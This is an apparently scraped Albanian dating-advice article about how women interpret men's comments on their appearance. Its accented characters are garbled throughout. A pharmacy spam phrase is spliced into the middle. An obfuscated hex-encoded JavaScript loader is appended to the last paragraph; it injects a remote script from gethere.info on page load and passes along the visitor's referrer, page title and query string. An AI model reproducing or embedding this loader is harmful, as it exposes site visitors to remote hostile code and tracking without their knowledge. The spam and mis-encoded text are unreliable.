854b207f81e524cefc44fa8942cf08a6

Femrat, nganjA�herA� dA�gjojnA� krejt tA� kundA�rtA�n qA� ju u thoni

Se femrat janA� krijesA� e komplikuar nuk A�shtA� ndonjA� zbulim, por me disa fshehtA�si A�shtA� e lehtA� t’i kA�naqni.

PA�r tA� shmangur situata tA� tilla A�shtA� mirA� t’i dini disa gjA�ra tA� cilat i dA�gjojnA� femrat kur mashkulli i thotA�.

Mashkulli thotA�: dukesh e lodhur
Femra dA�gjon: Nuk dukesh tA�rheqA�seA�
NjA� deklaratA� e tillA� te femrat tingA�llon se ajo nuk A�shtA� nA� shkA�lqimin e saj mA� tA� mirA� dhe se nuk duket mirA�. Do tA� duhet tA� shpreheshit me njA� pyetje mA� subtile si: “A A�shtA� gjithA�ka nA� rregull”?

Mashkulli thotA�:vA�rtetA� je dobA�suar
Femra dA�gjon: Dikur ishe me mbipeshA�A�
Femra e cila A�shtA� munduar shumA� dhe ia ka dalA� t’i humb kilogramA�t shtesA� kjo do tA� mund tA� tingA�llon te se mA� parA� nuk ishte e bukur. MA� mirA� t’i thoni “Dukesh fantastike”.

advair diskus without perscription. Mashkulli thotA�: dukesh mirA� pA�r – vitet qA� ke
Femra dA�gjon: Dukesh mirA� pa marrA� parasysh vitetA�

Mosha e femrA�s A�shtA� temA� e ndaluar, kjo shkruan edhe nA� bonton. Pa marrA� parasysh a bA�het fjalA� pA�r shaka apo kompliment, kurrA� mos pA�rmendni moshA�n.

Mashkulli thotA�: A�farA� ke bA�rA� me flokA�t?
Femra dA�gjon: Stili i ri i flokA�ve A�shtA� katastrofA�A�
Komentet si “dukesh ndryshe” apo “diA�ka ke ndryshuar tek vetja” lini thellA� nA� kokA�n tuaj dhe mos lejoni tA� dalin nga aty. Femra kA�tA� mund ta kuptojA� si painteresim tuajin. Provoni me “ky stil tA� shkon pA�r shtati”.

Mashkulli thotA�: mua mA� duken njA�soj
Femra dA�gjon: Nuk mA� interesonA�
NA�se femra ju pyet cila bluzA� i shkon mA� mirA�, pA�rpiquni tA� thoni diA�ka. Madje edhe nA�se A�shtA� njA�soj apo nuk vA�reni dallimin. “Ajo e para tA� shkon mA� shumA�” mjafton.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}